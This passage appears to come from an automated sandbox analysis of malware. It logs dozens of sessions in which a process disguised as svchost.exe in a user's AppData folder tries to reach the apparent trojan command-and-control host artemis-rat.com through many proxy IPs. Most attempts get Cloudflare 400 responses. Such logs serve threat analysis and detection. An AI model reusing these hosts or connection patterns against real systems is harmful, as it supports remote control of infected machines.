                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3756192.168.2.56200027.96.235.1718056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.640311956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3757192.168.2.56067851.89.173.402788743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.644160986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3758192.168.2.5619985.135.83.2148056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.647427082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3759192.168.2.56202552.196.1.1828056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.651396990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3760192.168.2.56198843.155.130.1821567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.652199030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    3761192.168.2.562011110.12.211.14080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.688604116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3762192.168.2.561875120.194.4.157544356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.691920042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3763192.168.2.562086104.18.220.958056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.700787067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.855202913 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:38 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3764192.168.2.561742104.37.135.145414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.711616993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3765192.168.2.561987222.223.103.232730256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.712985039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3766192.168.2.56083651.222.241.86291643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.728008986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3767192.168.2.561544199.58.184.97414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.743714094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3768192.168.2.562040190.128.228.1828056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.763926029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3769192.168.2.561541150.230.96.1501929156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.779207945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3770192.168.2.56210243.153.22.291000556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.779308081 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3771192.168.2.56199390.188.250.168056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.785788059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3772192.168.2.562068103.23.100.1414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.786684036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3773192.168.2.56207045.120.178.197108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.787462950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3774192.168.2.560768222.174.178.122499943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.788120031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3775192.168.2.56208095.164.89.123888856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.806495905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3776192.168.2.558888165.232.89.116312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.807342052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3777192.168.2.56207645.138.87.238108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.811558962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3778192.168.2.562036185.158.114.142569756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.816528082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3779192.168.2.558869190.220.228.147808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.824995995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3780192.168.2.562072103.42.57.13312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.840234041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3781192.168.2.55888643.255.113.2328043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.858952999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3782192.168.2.56209146.17.63.166909156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.859776020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3783192.168.2.562094134.209.189.428056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.862647057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3784192.168.2.561562198.49.68.808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3785192.168.2.559005177.234.194.22699943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3786192.168.2.562099120.76.42.209888856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3787192.168.2.562111193.239.58.92808156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3788192.168.2.56211845.61.188.1344449943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3789192.168.2.558972213.252.245.221611643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3790192.168.2.559117136.244.99.51888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3791192.168.2.562097124.163.236.54730256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3792192.168.2.562130142.4.123.418056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3793192.168.2.562117219.71.216.788043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3794192.168.2.56212834.49.208.2218056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3795192.168.2.561701198.12.255.193682156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3796192.168.2.56211634.95.243.122808156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3797192.168.2.559160162.144.121.2322478743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3798192.168.2.561637207.180.234.2204269256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3799192.168.2.562168104.25.115.1258056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3800192.168.2.562132163.172.169.271637956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3801192.168.2.562119103.146.137.5108143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3802192.168.2.55925845.10.42.20312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3803192.168.2.562138119.196.168.1838056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3804192.168.2.56212491.241.217.58909056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3805192.168.2.561582103.130.218.135400256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3806192.168.2.562178172.67.182.1508056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3807192.168.2.56216652.73.224.54312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3808192.168.2.562158199.58.184.97414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3809192.168.2.56164991.134.140.1603289656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3810192.168.2.559278161.34.67.83312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3811192.168.2.55914691.134.140.160540143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3812192.168.2.56214543.131.248.1651567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3813192.168.2.562127103.66.177.173225143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3814192.168.2.562155212.50.19.150415356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3815192.168.2.562198104.24.136.688056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3816192.168.2.56216146.17.63.166948056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3817192.168.2.56215943.155.130.1821567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3818192.168.2.562172207.180.198.2411722856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3819192.168.2.562171110.12.211.1408056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3820192.168.2.557867121.204.179.70777743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3821192.168.2.56228736.94.2.13844356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3822192.168.2.56228836.94.2.13844356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3823192.168.2.56228936.94.2.13844356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3824192.168.2.56229036.94.2.13844356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3825192.168.2.562215185.162.229.1278056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3826192.168.2.562187203.222.24.368043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3827192.168.2.562234185.238.228.2408056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3828192.168.2.562179185.158.114.142569756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3829192.168.2.56092172.206.181.976494343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3830192.168.2.562180222.223.103.232730256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3831192.168.2.562248172.67.36.218056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3832192.168.2.562209198.199.86.11808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3833192.168.2.559255202.164.209.69502043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3834192.168.2.562194103.23.100.1414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3835192.168.2.562262104.25.184.1898056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3836192.168.2.56226135.185.196.38312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3837192.168.2.56226934.49.208.2218056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


